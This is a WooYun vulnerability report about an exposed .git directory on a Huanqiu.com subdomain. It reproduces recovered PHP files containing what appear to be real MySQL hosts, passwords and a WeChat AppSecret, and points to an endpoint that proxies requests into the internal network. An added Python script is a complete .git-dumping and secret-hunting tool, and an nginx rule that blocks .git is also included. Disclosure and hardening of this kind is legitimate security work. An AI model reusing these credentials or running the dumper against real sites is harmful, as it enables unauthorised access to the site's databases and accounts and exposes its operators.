
Vulnerability summary

Defect ID: wooyun-2016-0173146

Title: Huanqiu.com (环球网) .git exposure leaks the MySQL database, WeChat appid and secret

Vendor: 环球网 (Huanqiu.com)

Author: 陆由乙

Submitted: 2016-01-28 12:05

Fixed: 2016-02-02 12:10

Disclosed: 2016-02-02 12:10

Type: sensitive information disclosure

Severity: High

Self-assessed Rank: 20

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-28: details sent to the vendor, awaiting the vendor's handling
2016-02-02: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Why won't the database accept external connections, aaaargh!
Huanqiu.com WeChat account: huanqiu-com

Detailed description:

http://interactive.huanqiu.com/.git/
Using lijiejie's script.

[screenshot: li.jpg]
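What a .git-dumping script such as lijiejie's does under the hood, as an added example (my own Python, not lijiejie's code and not anything recovered from the site): probe `.git/HEAD`, parse the binary `.git/index` to learn every tracked path and its blob SHA-1, fetch each blob as a loose object from `.git/objects/xx/yyyy...`, verify the hash and strip the `blob <size>\0` header. It runs against a constructed in-memory repository: `FAKE_SITE`, `fake_fetch` and the two placeholder PHP sources with obviously fake credentials are assumptions made for the example, and swapping `fake_fetch` for an HTTP GET of the target is the only change a real run needs. Objects that live only in a packfile are reported rather than recovered, and a truncated index download is rejected by its SHA-1 trailer.

```python
import hashlib
import struct
import zlib

# Added example, not lijiejie's script and not the site's code. fake_fetch stands
# in for an HTTP GET of https://target/<relpath>; all data below is constructed.

def make_loose_object(kind, payload):
    """(sha1-hex, zlib bytes) of a loose object exactly as git stores it."""
    raw = kind + b" " + str(len(payload)).encode() + b"\0" + payload
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)

def build_index(entries):
    """Version-2 .git/index from (path, sha1-hex) pairs; stat fields zeroed."""
    body = b"DIRC" + struct.pack(">II", 2, len(entries))
    for path, sha in sorted(entries):
        name = path.encode()
        # ctime(s,ns) mtime(s,ns) dev ino mode uid gid size, then sha, flags, name
        entry = struct.pack(">10I", 0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 0)
        entry += bytes.fromhex(sha) + struct.pack(">H", min(len(name), 0xFFF)) + name
        entry += b"\0" * (8 - len(entry) % 8)  # NUL terminator, padded to 8 bytes
        body += entry
    return body + hashlib.sha1(body).digest()

def parse_index(data):
    """[(path, sha1-hex)] for a v2/v3 index, after checking its SHA-1 trailer."""
    if data[:4] != b"DIRC":
        raise ValueError("not a git index")
    version, count = struct.unpack(">II", data[4:12])
    if version not in (2, 3):
        raise ValueError(f"index v{version} unsupported (v4 prefix-compresses paths)")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated download?)")
    pos, entries = 12, []
    for _ in range(count):
        sha = data[pos + 40:pos + 60].hex()
        (flags,) = struct.unpack(">H", data[pos + 60:pos + 62])
        fixed = 64 if version == 3 and flags & 0x4000 else 62  # extra flags word in v3
        name_len = flags & 0x0FFF
        if name_len < 0xFFF:
            name = data[pos + fixed:pos + fixed + name_len]
        else:  # very long names are NUL-terminated instead of length-prefixed
            name = data[pos + fixed:data.index(b"\0", pos + fixed)]
        entries.append((name.decode(), sha))
        pos += fixed + len(name) + (8 - (fixed + len(name)) % 8)
    return entries

def is_git_exposed(fetch):
    """Cheap probe: a readable .git/HEAD holding a ref line or a bare SHA-1."""
    head = fetch(".git/HEAD")
    if head is None:
        return False
    head = head.strip()
    return head.startswith(b"ref: refs/") or (
        len(head) == 40 and all(c in b"0123456789abcdef" for c in head))

def recover_files(fetch, index_bytes):
    """Fetch every indexed blob as a loose object -> ({path: bytes}, [not loose])."""
    recovered, missing = {}, []
    for path, sha in parse_index(index_bytes):
        packed = fetch(f".git/objects/{sha[:2]}/{sha[2:]}")
        if packed is None:
            missing.append(path)  # only in a packfile; needs pack parsing instead
            continue
        raw = zlib.decompress(packed)
        if hashlib.sha1(raw).hexdigest() != sha:
            raise ValueError(f"{path}: object {sha} failed its SHA-1 check")
        header, _, payload = raw.partition(b"\0")
        kind, size = header.split(b" ")
        if kind != b"blob" or int(size) != len(payload):
            raise ValueError(f"{path}: unexpected object header {header!r}")
        recovered[path] = payload
    return recovered, missing

def find_secrets(files):
    """Paths whose recovered source mentions a credential-bearing identifier."""
    needles = (b"mysqli", b"secret", b"password", b"appid")
    return sorted(p for p, s in files.items() if any(n in s.lower() for n in needles))

# Constructed target: two placeholder PHP files with obviously fake credentials.
COPDB_SRC = b"<?php\n$db = new mysqli('db.example', 'root', 'EXAMPLE-PASSWORD', 'wap');\n"
TOKEN_SRC = b"<?php\n$appid = 'wx-example'; $secret = 'EXAMPLE-SECRET';\n"

def _build_fake_site():
    site, entries = {".git/HEAD": b"ref: refs/heads/master\n"}, []
    for path, src in (("copdb.php", COPDB_SRC), ("php/get_wxtoken.php", TOKEN_SRC)):
        sha, packed = make_loose_object(b"blob", src)
        site[f".git/objects/{sha[:2]}/{sha[2:]}"] = packed
        entries.append((path, sha))
    site[".git/index"] = build_index(entries)
    return site

FAKE_SITE = _build_fake_site()

def fake_fetch(relpath):
    """Stand-in for an HTTP GET; body bytes, or None for a 404."""
    return FAKE_SITE.get(relpath)
```

Against a live target, `find_secrets(recover_files(fetch, fetch(".git/index"))[0])` gives the reading order: database wrappers and token helpers like the `copdb.php` and `get_wxtoken.php` reproduced below are exactly the files that carry credentials. A repository that has been gc'd will come back mostly in the `missing` list, which is the cue to fetch `.git/objects/pack/` and parse the packfiles instead.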

Proof of vulnerability:

copdb.php

<?php
//Open a new connection to the MySQL server
$mysqli = new mysqli('58.68.250.253','root','Hu#qU@bj%12!','wap',33061);
//Output any connection error
if ($mysqli->connect_error) {
die('Error : ('. $mysqli->connect_errno .') '. $mysqli->connect_error);
}
//MySqli Select Query
$results = $mysqli->query("SELECT intro,title,author,content,unix_timestamp(pub_time) as `time` from article_content where source='环球时报' limit 50 --");
$counter = 0;
while($row = $results->fetch_assoc()) {
if($counter == 50) break;
$data[] = array('type'=>7,'status'=>0,'intro_title'=>$row['intro'],'title'=>$row['title'],'sub_title'=>'','authors'=>$row['author'],'summary'=>'','content'=>$row['content'],'doc_time'=>$row['time'],'page_num'=>0,'page_name'=>'','issue'=>'','page_pic'=>'','coords'=>'','pub_source'=>'','copyright_source'=>'','order_id'=>'');
$counter ++;
}
$json = array('newsInfoList'=>$data,'pub_date'=>$row['time'],'issue'=>'','status'=>0,'timestamp'=>time(),'base_id'=>'','type'=>7);
echo json_encode($json);
// Frees the memory associated with a result
$results->free();
// close connection
$mysqli->close();
exit();


[screenshot: qqq.jpg]


baiduhot.php

<?php
set_time_limit(300);
$time = date("Y-m-d h:i:s");//current time
//fetch the Baidu data source
$targeturl = 'http://api.m.baidu.com/?from=1011361e&pu=osname@baiduboxapp,csrc@bdbox_dsfrc_auto&qq-pf-to=pcqq.c2c';
$logpath = '/home/logs/baiduhot.log';
$baidujson = file_get_contents($targeturl);
$baiduhot = json_decode($baidujson,true);
//initialise the database connection
$mysqli = new mysqli("58.68.250.252" , "baiduhot" , "baiduhot@BJ%123" , "huanqiuwap1" ,33060) ;
$mysqli -> set_charset("utf8") ;
if ($mysqli -> connect_errno) {
echo "Failed to connect to MySQL: (" . $mysqli -> connect_errno . ") " . $mysqli -> connect_error ;
}
for ($i=1; $i < 7; $i++) {
$word = $baiduhot['hot'][$i]['word'];
$url = $baiduhot['hot'][$i]['url'];
$sql= "UPDATE Baidu_hot set word='{$word}',url='{$url}',updatetime='{$time}' WHERE wordid=$i --";
$status = $mysqli -> query($sql) ;
$result[]=array('time'=>time(),'data'=>array('word'=>$word,'url'=>$url,'status'=>$status));
}
$mysqli -> close() ; //close the mysql connection
$a = json_encode($result)."\n";
file_put_contents($logpath,$a,FILE_APPEND);
exit();
?>


waptotthz.php

<?php
$tmp = $_POST['wapid'];
$wapid = intval(strip_tags($tmp));
// $wapid = htmlspecialchars(string)
if(!empty($wapid) && $wapid > 0){
$tthzid =false;
$mysqli = new mysqli("58.68.250.252" , "baiduhot" , "baiduhot@BJ%123" , "huanqiuwap1" , 33060) ;
$mysqli -> set_charset("utf8") ;
if ($mysqli -> connect_errno) {
echo "Failed to connect to MySQL: (" . $mysqli -> connect_errno . ") " . $mysqli -> connect_error ;
}else{
$sql = "SELECT NewsRss2.id,NewsRss2.newsid FROM NewsRss2 WHERE newsid = $wapid";
$result = $mysqli->query($sql);
$data = $result ->fetch_row();
if(!empty($data[0])){
$tthzid = $data[0];
}
}
$mysqli -> close(); //close the mysql connection
}else{
return ;
}
$response = $tthzid?"<textarea><tr><td>$wapid</td><td>$tthzid</td><td><a href=\"http://tthz.huanqiu.com/viewTouTiao.html?newId=$tthzid&f=jrtt\">http://tthz.huanqiu.com/viewTouTiao.html?newId=$tthzid&f=jrtt<a></td></tr></textarea>":"<textarea><tr><td>$wapid</td><td>未找到</td><td>未找到</td></tr></textarea>";
echo $response;
exit;
?>


test1.php

<?php
echo file_get_contents('http://mirrors.huanqiu.com/php/get_wxtoken.php');
$ch = curl_init("http://mirrors.huanqiu.com/php/get_wxtoken.php") ;
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; // return the fetched data instead of printing it
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ; // with CURLOPT_RETURNTRANSFER enabled, return the fetched data
curl_setopt($ch, CURLOPT_PORT,'80') ; // with CURLOPT_RETURNTRANSFER enabled, return the fetched data
echo $output = curl_exec($ch) ;
var_dump($output);exit();
?>


http://interactive.huanqiu.com/sougou.php?from=1
from=1 through 10 returns data from the internal network.

<?php
if(isset($_GET['from'])){
$from = substr($_GET['from'],0,10);
echo file_get_contents('http://192.168.120.13/index.php?m=dbsource&c=hz&a=createXmlFor_sougou&from='.$from);
}else{
echo 'error';
}
exit();
?>


{"ip_list":["101.226.62.77","101.226.62.78","101.226.62.79","101.226.62.80","101.226.62.81","101.226.62.82","101.226.62.83","101.226.62.84","101.226.62.85","101.226.62.86","101.226.103.59","101.226.103.60","101.226.103.61","101.226.103.62","101.226.103.63","101.226.103.69","101.226.103.70","101.226.103.71","101.226.103.72","101.226.103.73","140.207.54.73","140.207.54.74","140.207.54.75","140.207.54.76","140.207.54.77","140.207.54.78","140.207.54.79","140.207.54.80","182.254.11.203","182.254.11.202","182.254.11.201","182.254.11.200","182.254.11.199","182.254.11.198","59.37.97.100","59.37.97.101","59.37.97.102","59.37.97.103","59.37.97.104","59.37.97.105","59.37.97.106","59.37.97.107","59.37.97.108","59.37.97.109","59.37.97.110","59.37.97.111","59.37.97.112","59.37.97.113","59.37.97.114","59.37.97.115","59.37.97.116","59.37.97.117","59.37.97.118","112.90.78.158","112.90.78.159","112.90.78.160","112.90.78.161","112.90.78.162","112.90.78.163","112.90.78.164","112.90.78.165","112.90.78.166","112.90.78.167","140.207.54.19","140.207.54.76","140.207.54.77","140.207.54.78","140.207.54.79","140.207.54.80","180.163.15.149","180.163.15.151","180.163.15.152","180.163.15.153","180.163.15.154","180.163.15.155","180.163.15.156","180.163.15.157","180.163.15.158","180.163.15.159","180.163.15.160","180.163.15.161","180.163.15.162","180.163.15.163","180.163.15.164","180.163.15.165","180.163.15.166","180.163.15.167","180.163.15.168","180.163.15.169","180.163.15.170",""]}


get_wxtoken.php

<?php
if($_GET['par']=='wx133b04ad'){
$res = file_get_contents('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=wx133b04ad9003db0a&secret=79fbbcf462e668eb0f988d5821e32afc');
$res = json_decode($res, true);
$ticket = file_get_contents('https://api.weixin.qq.com/cgi-bin/ticket/getticket?access_token='.$res['access_token'].'&type=jsapi');
echo $ticket;
}
else{
echo 'sfsdfdsferror';
}
exit();
?>


appid=wx133b04ad9003db0a
secret=79fbbcf462e668eb0f988d5821e32afc
http://mp.weixin.qq.com/debug/
http://interactive.huanqiu.com/get_wxtoken.php?par=wx133b04ad
dynamic token retrieval

Fix recommendation:

Delete it.
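The one-word fix above removes this copy of `.git`, but the web server should also refuse to serve any `.git` directory so that the next deploy cannot re-expose it. An added nginx example, not from the page or the vendor (the `location` pattern and the 404 response are my choice; the same regex can go into Apache's `DirectoryMatch`):

```nginx
# Refuse any request that enters a .git (or .svn/.hg) directory, including the
# bare directory itself: /.git, /.git/, /.git/HEAD, /sub/.git/index
location ~ /\.(git|svn|hg)(/|$) {
    return 404;
}
```

Returning 404 rather than 403 avoids confirming that the directory exists. Blocking the path is not a substitute for rotating what already leaked: the `root` and `baiduhot` MySQL passwords and the WeChat AppSecret in the files above are now public, and `get_wxtoken.php` keeps handing out valid access tokens to anyone who knows `par=` for as long as the old secret stays valid.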

Copyright notice: when reposting, credit the source 陆由乙@乌云


Vulnerability response

Vendor response:

Severity: No impact (ignored by vendor)

Ignored on: 2016-02-02 12:10

Vendor reply:

Vulnerability Rank: 4 (WooYun assessment)

Latest status:

None yet